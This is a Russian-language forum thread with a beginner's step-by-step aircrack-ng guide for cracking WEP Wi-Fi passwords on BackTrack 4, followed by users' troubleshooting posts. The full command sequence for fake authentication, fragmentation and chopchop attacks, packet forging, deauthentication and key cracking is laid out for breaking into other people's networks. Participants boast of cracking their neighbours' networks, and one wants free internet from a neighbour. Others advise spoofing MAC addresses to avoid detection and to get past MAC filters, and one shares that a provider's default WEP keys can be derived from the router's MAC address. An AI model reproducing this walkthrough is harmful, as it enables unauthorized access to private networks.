Статейку накатал с опыта много чего не указал примеров нету и не нада - выложу видео ето будет проще
используем БТ4 , статья для тех кто не знает что такое линукс и ниразу с ним не работал не бойтесь
пытаться юзать линукс все очень просто я уверен что у вас получиться , все остальные вопросы можна найти на форуме
я уверен что там есть ответы.

1) airmon-ng start wifi0 Запускаем карту ( wlan0 -ето интерфейс он у каждого компа разный в даном случае wlan0)
еще бывают ath0 mon0 итп.
2) airodump-ng wlan0 Запускаем мониторинг список сетей, выбираем мак сети и канал который будем ломать
определиться с выбором можна просто смотрим какой сигнал сильнее логично , ето дело можна записывать но я
просто командой выдиляем ето окно и жмем Ctrl+c - останавливает процес мониторинга , после выбора канала
останавливаем все окна командой Ctrl+c и делаем такое
airmon-ng stop mon0
airmon-ng stop wlan0 (внимание ето мой интерфейс у вас он может быть другим я выше писал)
airmon-ng start wlan0 и канал сети которую будем ломать выглядит ето так
airmon-ng start wlan0 9 - пример.


3) macchanger wlan0 смотрим свой мак адрес, визде по разному работает если у вас их 2 то первый ваш.
В линуксе есть по стандарту 2 десктопа первые три выше указаных команды проделываем в одном десктопе
а все остальное открываем 2 десктоп и проделываем все остальное ниже указаное ето для вашего удобства.

4) airodump-ng -c канал сети --bssid мак сети которую ломаем -w capture wlan0 запускаем монитор сети
в етом окне будет мак ломаемой сети. И будут собираться пакеты.

Пятая команда выполняеться в одном окне если все прошло нормально после пыполнения команд вы увидите
англ текст и вот такое вот :-)
5) 1. aireplay-ng -1 0 -e (название сети которую ломаем) -a (мак сети которую ломаем) -h (ваш мак) wlan0
2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) wlan0

6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y
7) aireplay-ng -4 -h (ваш мак) -b (мак который ломаем) wlan0 атака отдельное окно будет задавать вопрос
жмем y


Если атака удалась то вы увидите файл .xor - его нада прописать ниже в первой команде
8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
2. aireplay-ng -2 -r arp-request wlan0
Команда 8 набираем в одном окне
Ну вот и конец всему при наборе етой команды програма начнет переберать собраные пакеты их нада от 20 000
до 2000000 восновном весь процес в среднем занимает 15- 60 минут ,
если у вас не удалось запустить -4 -5 и -1 не растраивайтесь продолжайте собирать пакеты они форматом .cap
сохраняються на ваш рабочий стол..
9) aircrack-ng -b ломаемый мак capture*.cap

Если пишет что KEY FOUND! - вы нашли пароль ... если в пароле будут все нули ето не верный пароль, продолжайте
собирать пакеты до тех пор пока не найдете пароль ... взлом только шифрование wep

Я думаю у вас получиться 8-)...
БТ4 качаем с оф сайта большая скорость пол часа и скачали бесплатно.
Более конкретно обсосать aircrack и airdump можна у Elvis000 на ветке (http://forum.antichat.ru/thread50472.html)
.................................................. ...................................
Что б не флудить решил сюда добавить по теме у кого провайдер PTv недавно просек тему у них у всех стоит wep 64 битный , пароль можна узнать очень просто 1. вариант admin логин и пароль 2. вариант МАК адрес ето и есть пароль только пропустите первые две цыфры а все остальное ето пароль , 5 точек проверил все работает ! :-) ...

Отлично, жду видио.

bt4 предфинальная версия:

Шаг 1 останавливаем wi-fi карту: ifconfig wlan0 down
шаг 2 меняем мак: macchanger --mac 00:11:11:11:11:11 wlan0
шаг 3 подымаем wi-fi карту: ifconfig wlan0 up
шаг 3 включаем wi-fi карту в режим мониторинга: airmon-ng start wlan0 "получаем виртуальный интерфейс mon0"
шаг 4 запускаем программу сканирования wi-fi сетей: airodump-ng mon0
шаг 5;6:7 и тд. читаем тему от Elvis000 "Документация по airodump-ng, aircrack-ng." там всё популярно написано.

sergey_allll
фак писал что б пасажири которые не умеют летать на линукс не писали в пм а сразу ломали сеть . зачем флудить в теме ?

БТ4 качаем с оф сайта большая скорость пол часа и скачали бесплатно.

Я тебя засужу за обман.. на моем Зюкселе 56К не скачалось за пол часа ;) (стеб)

не умеют летать на линукс не писали в пм а сразу ломали сеть

этой статьей ты только сильнее превлек внимание к своему ПМ, да и те кто "не умеют летать на линукс" даже с этой статейкой не полетят.

зачем флудить в теме ?

Это не флуд а открытое мнение о том что ты, как таковое выложил перевод офф. доков (просто сжато и на родимом, могучем. за что и маленький респектик тебе).

статья для тех кто не знает что такое линукс и ниразу с ним не работал
извини конечно но твоя статья никак не может быть руководством для начинающих пользоваться ОС Linux и д.р. Unix подобных.

Спасибо за внимание, оформление статьи не сахар =(

POS_troi


я видио выложу тады в ПМ писать не будут 8-)

На пятом пункте постоянно:

Sending Authentication Request (Open System)
Attack was unsuccessful. Possible reasons:

* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver/card doesn't support injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* You're too far from the AP. Get closer, or lower
the transmit rate.

------------
все сломать эту точку уже не удастся, верно?

LuCiFeR если это wep то получить пороль можно.
У вас может не хватает мощности вашей wi-fi карты или на AP стоит фильтрация по MAC, ещё попробуйте пройти Authentication когда на AP появится клиент.

LuCiFeR у тя чипсет не centrino случайно ? если да то просто собирай пакеты , на 25000 можешь пробовать крякать если мало собирай до тех пор пока не напишет что пароль найден

У меня Асус М50Vc. я склоняюсь к тому варианту что сигнал слабоват.
Вообще я занимаюсь этим впервые, до этого никсы вообще не трогал. Но обстоятельства сложились так, что в этом месяце я не могу заплатить за свой инет, по этому ищу альтернативу в соседском вай фае)))

http://img62.imageshack.us/img62/3482/snapshot1hm.png

Кто нить тут видит приличную точку? )))

LuCiFeR

самая первая самая нижняя и кствати одна открытая )

Ищи где шифрования WEP, и снифай ломай))
а WPA брутить надо=)

я то полетел -)....

6)aireplay-ng -5 -b (мак который ломаем) -b (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y


6) aireplay-ng -5 -b (мак который ломаем) -h (ваш мак) wlan0 атака отдельное окно будет задавать вопрос
жмем y

вот так правильней по моему ><


-----------

не понимаю я, пробовал уже 4 wep защищенных точки, ни разу не удалось... хотя сигнал больше половины... может у меня карточка не подходящая?

ага .. очепятка . исправил!
если карта не подходит то просто собирай пакеты , да оно б писало что вас чипсет не подходит на англ... у тя не сентрино чипсет случйно если нет то не беспокойся )

atheros

Застрял на третем пункте
ввожу sudo macchanger wlan0
Current MAC: 00:11:11:11:11:11 (Intel Corporation)
ERROR: Can't change MAC: interface up or not permission: Device or resource busy

с чем это связано?

Robert007, ifconfig wlan0 down
Читай код ошибки, устройство занято, следовательно его нужны остановить...

Вопрос к затокам, я пробовал 10 разновидностей атак, при сигнале 100% на 10 разных точках, ни разу не смог добится хотяб какого нить результата... У меня убунту 9.10 с пакетом аиркрака... быть может у меня драйвер не подходит? Чипсес atheros, дрова стандартные с пакета убунту. Подскажите что делать. Модель ноутбука Asus M50Vc

Всё чделал как написано
Пункт 4,6,7 без проблем
Идёт мониторинг и два окна читают пакеты (вроде всё нормально 9000 и 7000 пакетов)

оно само законить читать или нужно выключить в ручную?
на рабочем столе никаких файлов не появилось,они появяться потом?
в мониторинге в #Data стоит значение 6 и не поднимаеться,это нормально?

Застрял на третем пункте
ввожу sudo macchanger wlan0
Current MAC: 00:11:11:11:11:11 (Intel Corporation)
ERROR: Can't change MAC: interface up or not permission: Device or resource busy

с чем это связано?
ни с чем просто мак адрес копируй и делай все дальше .... -)

Всё чделал как написано
Пункт 4,6,7 без проблем
Идёт мониторинг и два окна читают пакеты (вроде всё нормально 9000 и 7000 пакетов)

оно само законить читать или нужно выключить в ручную?
на рабочем столе никаких файлов не появилось,они появяться потом?
в мониторинге в #Data стоит значение 6 и не поднимаеться,это нормально?
дата ето вектора ивы пакеты которые ломаються их нада собирать если молчит то нада ждать пока подымиться хотя б до 25 000

Robert007, ifconfig wlan0 down
Читай код ошибки, устройство занято, следовательно его нужны остановить...

Вопрос к затокам, я пробовал 10 разновидностей атак, при сигнале 100% на 10 разных точках, ни разу не смог добится хотяб какого нить результата... У меня убунту 9.10 с пакетом аиркрака... быть может у меня драйвер не подходит? Чипсес atheros, дрова стандартные с пакета убунту. Подскажите что делать. Модель ноутбука Asus M50Vc
должно работать. оно если атака не удаеться выкидывает ерор там написано что не конает

дата ето вектора ивы пакеты которые ломаються их нада собирать если молчит то нада ждать пока подымиться хотя б до 25 000

Скажи пожалуйста а для чего тогда пункт 6,7?read packets когда нибудь закончиться?

что делать когда наберёться 25000?где искать файл?

извини за нубство,просто я сегодня первый раз увидел убунту и всё это для меня новое

Во я дебил!

теща, постоянно одинаковые ошибки... о том что либо фильтрация по мак адрессу, либо сигнал слабый... при любом виде атаки на любое шифрование...
+ ко всему wifizoo ни ловит ни одного пакета с открытых точек..

Я думаю что всё таки проблема в стандартном драйвере ath9k - [phy0], как его заменить пока понять не могу... скачал в менеджере приложений madwifi-drivers и madwifi-tools, но драйвер все равно не сменился, а тулзу запустить не могу...
Не подскажите как в ручную сменить драйвер?

Решил перезапустить процесс,перезагрузил комп и застрял на первом пункте
пишу airmon-ng start wlan0 в ответ Run it as root
пробывал ifconfig wlan0 down в ответ bash: sude: команда не найдена

помогите пожалуйста ,всё работало теперь нет!!!

Или запустить под root'ом, либо в начале каждой команды пиши sudo
Например sudo airmon-ng start wlan0

мдя..
ты бт4 скачай , ато я на нем все делл прошло вс ништяк половина соседей поломаных , обещал зделать видео при перво же возможности повешаю сюда времени ноль ( ...
если мониторинг был уже ништяк ! мак карты тоже определло не должно быть никаких проблем! ты внимательно пишеш 1 ошибка и команда не конает ..я долго игрался )

Пишу все правильно... и дело не в сборке, один фиг убунта)) Так что нету инфы как дрова поставить? )

в раздел линукс подождешь пару дней можт кто ответит :-) ... там трудный вариант чет добиться ) . а еще лучше по гуглить ... я не думаю что ето дрова чет другое .. посстараюсь к вечеру видео зделать

Вопрос к затокам, я пробовал 10 разновидностей атак, при сигнале 100% на 10 разных точках, ни разу не смог добится хотяб какого нить результата...

не забывайте что точки могут фильтровать по списку разрешенных MAC

не забывайте что точки могут фильтровать по списку разрешенных MAC
ага я тож так поставил ибо впа ткип и мой 18 символьный пароль на долго не хватает :-) ...

не забывайте что точки могут фильтровать по списку разрешенных MAC

да я это понимаю, но дело в том что я свою точку настроил на стандартный wep, сам его сломать не смог ;D
тоже самое с wpa и wpa2

а так-же сделал её открытой, и пытался по снифить через wifizoo, результат нулевой.

Все мои мысли сводятся к драйверу ath9k - [phy0], который работает не правильно, хотя в монитор режим переводит без проблем..

POS_troi, а ты случаем не знаешь как мне его заменить на madwifi? ;)

тут почитай

http://sudouser.com/ustanovka-drajvera-madwifi-dlya-setevogo-adaptera-atheros-5xxx.html

Решил проблему с Wifizoo, удалил убунту 9.10, поставил БТ4))))))))
Ща буду пробовать вепы ломать))

Решил проблему с Wifizoo, удалил убунту 9.10, поставил БТ4))))))))
Ща буду пробовать вепы ломать))
давно пора ! удалять не нада было просто грузился б с диска как и все остальные :-)

Чет пока глухо все попытки поломать WPA кончаются этим:

root@LuCiFeR:~# aireplay-ng -0 1 -a 00:14:6C:94:A8:06 -c 00:17:31:AF:4B:90 wlan0
03:06:21 Waiting for beacon frame (BSSID: 00:14:6C:94:A8:06) on channel 11
03:06:21 Sending 64 directed DeAuth. STMAC: [00:17:31:AF:4B:90] [ 0| 0 ACKs]
root@LuCiFeR:~#

жесть.. ;(

Пысы: Кто нить подскажет как раскладку клавиатуры настроить? Стандартно не переключается, на русский могу перейти только через ctrl+alt+k ;(

теща, а правильно что я 5 - 6 - 7 пункты выполняю одновременно в разных окнах? )

Вот такая штуковина

Failure: the access point does not properly discard frames with an
invalid ICV - try running aireplay-ng in non-authenticated mode instead.

Больше 1200 data собрать не удалось (((

теща, а правильно что я 5 - 6 - 7 пункты выполняю одновременно в разных окнах? )
да 6 7 две разных атаки -4 срабатывает чаще чем -5

ты ж ведь када начинаешь ломать сеть останавливаешь все мониторы равда ? командой контл С ... потом када начинаешь в самом первом окне ты давал команду к примеру
airmon-ng start wlan0 11 где 11 - ломаемый канал
если меняешь сеть визде все остановить и перепрописать или проще для тебя начать заново но мониторы следует останавливать командой стоп перед тем как начинать сканировать другую сеть..

Когда я начинаю аероплей у меня картачка в монитор моде, следит за аеродампом по каналу определенному. больше ни чего вроде не запущено

Мне dhcp в процессах мешал, убил его, буду пробовать)


04:40:39 Sending Authentication Request (Open System) [ACK]
04:40:39 Authentication successful
04:40:39 Sending Association Request [ACK]
04:40:39 Association successful :-) (AID: 1)

Это у меня получается, а вот все остальные атаки не работают....
Пакеты не отсылаются постоянно 0 ARP request and 0 ACKs

в чем может быть проблема? Плохой сигнал?

Мне dhcp в процессах мешал, убил его, буду пробовать)


04:40:39 Sending Authentication Request (Open System) [ACK]
04:40:39 Authentication successful
04:40:39 Sending Association Request [ACK]
04:40:39 Association successful :-) (AID: 1)

Это у меня получается, а вот все остальные атаки не работают....
Пакеты не отсылаются постоянно 0 ARP request and 0 ACKs

в чем может быть проблема? Плохой сигнал?
отот текст с верху обозначает что все ништяк! он должен появиться 2 раза .. потом у тя проценты пойдут! ты увидиш ... если атака удалась то пакеты очень быстро собируться я пока по курил около 50 тыщ уже было ...
вот тебе дока (http://chat.rubiport.com/how_to_crack_wep_with_no_packets.pdf) pdf глянь ... тема такая если атака не прошла ты ее закрываеш .. если вторая не прошла тож закрываеш ... или пытаешься зделать позже смысл в бекон пакетах любым макаром их нада собирать.. -)

Здраствуй LuCiFeR ты прошёл Association на AP значит твои пакеты она принимает теперь жди клиента , когда полетят data пакеты проведи инжекцию aireplay-ng -3 ... или aireplay-ng -2... ; но до этого нужно обязательно пройти Association тоесть aireplay-ng -1 0 ... ;при проведении инжекции крути свой ноутбук или антенну чтобы скорость приёма data пакетов была максимальной , плохой сигнал скорость 50-100 p/s хороший сигнал 300-400 p/s.После приема 25000 пакетов запускай другую консоль Aircrack-ng с параметром -n 64 если в кносоли где работает airodump-ng количество data пакетов перевалит за 100000-150000 а пороль не будет найден попробуй запустить aircrack-ng с параметром -n 128 и тд.
Удачи тебе, wep точки будут твои!

Что я уже только не пробовал нифига не получается... давайте по порядку, ткните носом что я делаю не так:

1. Конфигурирую точку.. WEP 64bit
2. ifconfig wlan0 up
2. airmon-ng start wlan0 6

Interface Chipset Driver

wlan0 Atheros ath9k - [phy0]
(monitor mode enabled on mon0)

airodump-ng mon0

BSSID PWR Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

02:1B:11:E2:0E:FB -59 16 0 0 6 54 WEP WEP AsusLan

airodump-ng -c 6 --bssid 02:1B:11:E2:0E:FB -w capture mon0

CH 6 ][ Elapsed: 4 s ][ 2009-11-07 17:44

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

02:1B:11:E2:0E:FB -44 100 63 0 0 6 54 WEP WEP AsusLan

BSSID STATION PWR Rate Lost Packets Probes

Далее открываю новую консоль.
Пишу

aireplay-ng -1 0 -a 02:1B:11:E2:0E:FB -h 00:24:23:05:2A:31 mon0

Получаю:

17:46:25 Waiting for beacon frame (BSSID: 02:1B:11:E2:0E:FB) on channel 6

17:46:25 Sending Authentication Request (Open System) [ACK]
17:46:25 Authentication successful
17:46:25 Sending Association Request [ACK]
17:46:25 Denied (code 12), wrong ESSID or WPA ?

17:46:28 Sending Authentication Request (Open System) [ACK]
17:46:28 Authentication successful
17:46:28 Sending Association Request [ACK]
17:46:28 Denied (code 12), wrong ESSID or WPA ?

Ето только на моей точке, остальные проходят этот пункт отлично, а вот остальные не очень.

LuCiFeR 1. Конфигурирую точку.. WEP 64bit

а wep open или psk

Там нету таких настроек, только сессию Guest можно разрешить, собственно это я и сделал...
А вообще так тока на моей точке, на других нормально этот пункт работает... а вот с остальными беда...

спасибо за статью есть два вопроса : после этой команды
5. 2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) mon0
процесс не останавливаеться . так и надо ?
как запустить 8 пункт что то не получаеться 8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
куда записывать получиные Saving plaintext in replay_dec-1108-140631.cap
Saving keystream in replay_dec-1108-140631.xor ? пример если не трудно
сильно не пеняйте новичка :confused:

спасибо за статью есть два вопроса : после этой команды
5. 2. aireplay-ng -1 6000 -o 1 -q 10 -e (имя сети) -a (mac каторый ломаем) -h (ваш мак) mon0
процесс не останавливаеться . так и надо ?
как запустить 8 пункт что то не получаеться 8) 1. packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно и вписываем команду 2.
куда записывать получиные Saving plaintext in replay_dec-1108-140631.cap
Saving keystream in replay_dec-1108-140631.xor ? пример если не трудно
сильно не пеняйте новичка :confused:
внимательней читай 8 пункт запускаеться тады если у тя атака удалась то есть -4 -5 ...

вроде и делаю как написано только не останавливается команда 5.2 .
только я на хубунте ;) счас докачает бт4 попробую ещё!
всеравно 8 непонятна ! :D

wesside кто нить пробавал если то как прошло ?

вроде и делаю как написано только не останавливается команда 5.2 .
только я на хубунте ;) счас докачает бт4 попробую ещё!
всеравно 8 непонятна ! :D
смари ты запускаешь -1 --- он должен быть в режиме мониторинга обизательно без ошибок аутентификацыя твоей карты если все хорошо пишет ,,ливе пакет,, -- чет типа того один и тот же текст , потом запускаеш -4 -5 --- ето атака одна из них должна сработать если сработало или -4 или -5 ут япоивиццо в окне проценты таблица типа и пакеты будут собираццо с большой скоростю вот и када набереться достаточное количество пакетов окно само остановиться и будет писать что файл .cap .xor найдены ... после етого (если у тя есть больше чем 30 000 пакетов можеш пробовать ломать) -- в ето время пакеты собираються сами ты не останавлииваешь никакой процес ! через каждые 10 000 пакетов юзай команду аиркряка так как там написано .... вобще м то все ..

перевел карту поменял мак потом
аirodump-ng -c 9 --bssid 00:14:6C:7E:40:80 -w output
aireplay-ng -3 -b 00:14:6C:7E:40:80 -h 00:0F:B5:88:AC:82 mon0
aireplay-ng mon0 -1 4000 -a 00:14:6C:7E:40:80
крек и все получил ключ на все заняло минут 15 это на другой
а которую первую пробовал там полный ноль не шевелиться хоть тресни
на ночь ставил только 600 пакетов
вокруг меня таких непонятных гнездо у них и имена похожи
в чём дело непойму . пойду бубен куплю ;)
благодорю за внимание разобрался фильтр по маку все про все 1 час 15 мин

Есть пакет хор. , пока не раьотает это
Такой вопрос есть ключ от первой сети айфон подключил без проблем а комп не даёт что за пзц ?)

Есть пакет хор. , пока не раьотает это
Такой вопрос есть ключ от первой сети айфон подключил без проблем а комп не даёт что за пзц ?)
возможно на роутере стоит фильтр по МАК адресам и тебя не пускает!.

так и было , подождал до подключения клиента , записал мак , поменял и я в полете
спасибо очень просто даже для новичка

Доброго времени суток уважаемые ! Использую bt4 . В гугле уже прописался ,перечитал все , что можно , но никак не пойму алгоритм последовательности команд : начну по порядку как написано в топе .
1. airmo-ng

выскакивает две карты wlan0 и wlan1 (где wlan0 встроеный в лоптоп, а wlan1, это alfa awus036h)
2. airmon-ng start wlan1 запуск карты в режиме мониторинга

3. airodump-ng wlan1 пошел мониторинг списка сетей, ывбрал сеть. Остановил процесс ctrl+c дальше airmon-ng stop wlan1

4. airodump-ng -c канал сети --bssid мак сети -w capture wlan1
пошел процесс сбора beacons и data пакетов. Здесь вопрос : нужно ли останавливать этот процесс после набора нужного кол-ва data пакетов , или пункты 4,5,6 делаются сразу друг за другом ?

И еще впрос в процессе мониторинга сете , в зоне захвата которых я нахожусь попадаются открытые сети без всякого шифрования ENK OPN , там beacons и data пакеты просто летают(за 15 мин beacons 9000 а data 50000), подключаюсь к ней пишет что доступ только локальная сеть! Какую выгоду можно извлечь из этого ? :)

Sorry забыл за ранее поблагодарить за помощь !

4. airodump-ng -c канал сети --bssid мак сети -w capture wlan1
пошел процесс сбора beacons и data пакетов. Здесь вопрос : нужно ли останавливать этот процесс после набора нужного кол-ва data пакетов , или пункты 4,5,6 делаются сразу друг за другом ?

Останавливать не нужно пускай airodump-ng набирает пакеты. А мак не ленись меняй сразу не пались.

Остановился на 8 пункте packetforge-ng -0 -a мак сети -h твой мак -k 255.255.255.255 -l 255.255.255.255 -y .xor -w arp-request появится окно, окна нет. Появляется Wrote packet to: arp-request что это?В чем проблема?

подскажите , точка открытая . Но пускать не хочет .(вероятно фильтр мака)
вопрос -- как узнать - есть ли на ней клиент , и его мак ???

(virtualbox) Backtrack не видит мою карточку
root@bt:~# airmon-ng start wifi0

Interface Chipset Driver



root@bt:~# iwconfig
lo no wireless extensions.

eth0 no wireless extensions.

Есть идеи как сие исправить? У меня Edimax 7318USg.

Здрасьте, после длительного перерыва я всё-таки решил занятся беспроводными сетями вновь)) Надеюсь в этот раз будет гораздо больше успеха))

Первым что я сделал это модифицировал свой ноут и прикупил девайсов))

Просверлил дырку в корпусе ноута, припоял конект к вайфайке своей, теперь могу подключать антены стандартного разьёма))
http://cs4419.vkontakte.ru/u815231/104164368/x_1933ca20.jpg

Осталось разобратся с bt4 и начинать ломать всё что найдётся)))

найден ключ, а что дальше с ним делать?
разобрался как в Линуксе подрубаться, а в windows проблема. :(

Люди у меня вот какой вопрос ? Ломал сеть с помощью ВТ 4 и вконце мне высветило вот это: unable to identify the PSK from the dictionary file. Try expanding your passphrase list and double-check the SSID. Sorry it didn t work out

На восьмом шаге пишет Wrote packet to: arp-request

Всё получилось уперся в такое.
вопро как быть если на точке нет не1 data пакета, а беакон шпарит..пробовал пункты 5.6.7 тишина raed пакеты и всё...что выхода нет ждать пока ктонить подсоедениться?

что выхода нет ждать пока ктонить подсоедениться?

Выход есть,нужно установить spoonwep2 и тогда не придётся ждать пока кто-то подключится к точке.

ок. попробую.

подскажите плиз, куда собираются пакеты, где искать этот файл? работаю через Virtualbox через флэшку

Кто поможет не получаю файл xor
после пунктов 6 - 7
идёт прием пакетов, останавливается , спрашивает воспользоваться ли принятыми пакетами , затем вот записывает пакет, отсылает, но не получает ответа.. и так до бесконечности…

Пишу все правильно... и дело не в сборке, один фиг убунта)) Так что нету инфы как дрова поставить? )

подскажите пожалуйста, в чём проблема, запускаю БТ3 через виртульную флешку, проходит мониторинг сетей всё хорошо, но когда начинаю захват пакетов то очень часто не вижу мас клиента(STATION), а вижу мас точки доступа и всю другую инфу, но иногда показывает, но очень редко, антенаUSB на чипсете REALTEK RLT8187 в чем проблема, спасибо заранее!!!!

(virtualbox) Backtrack не видит мою карточку


Есть идеи как сие исправить? У меня Edimax 7318USg.
А ты дрова то ставил? :)

В Ubuntu 9 версии они уже есть.
Достаточно прописать
modprobe rt73usb
modprobe rt2500usb

Если не получилось то вот полная инструкция

http://lookherefirst.wordpress.com/2008/11/02/setting-up-edimax-ew-7318usg-under-linux/

хоть в лепешку раздолбись, не показывает STATION, а без этого не могу дальше посылать пакеты, может кто знает каким образом можно узнать STATION?

мак клиента, вмысле подключенного?

ну да, это после того как я запустил аэродамп на этого клиента

тут почитай

http://sudouser.com/ustanovka-drajvera-madwifi-dlya-setevogo-adaptera-atheros-5xxx.html

а это важно что у меня не Atheros?

важно, потому что у тебя тогда другой драйвер

и где мне его искать? чипсет RTL8187. но вообще я не пойму вот ещё 2 сетки взломал, а сейчас снова не видит, глючит наверное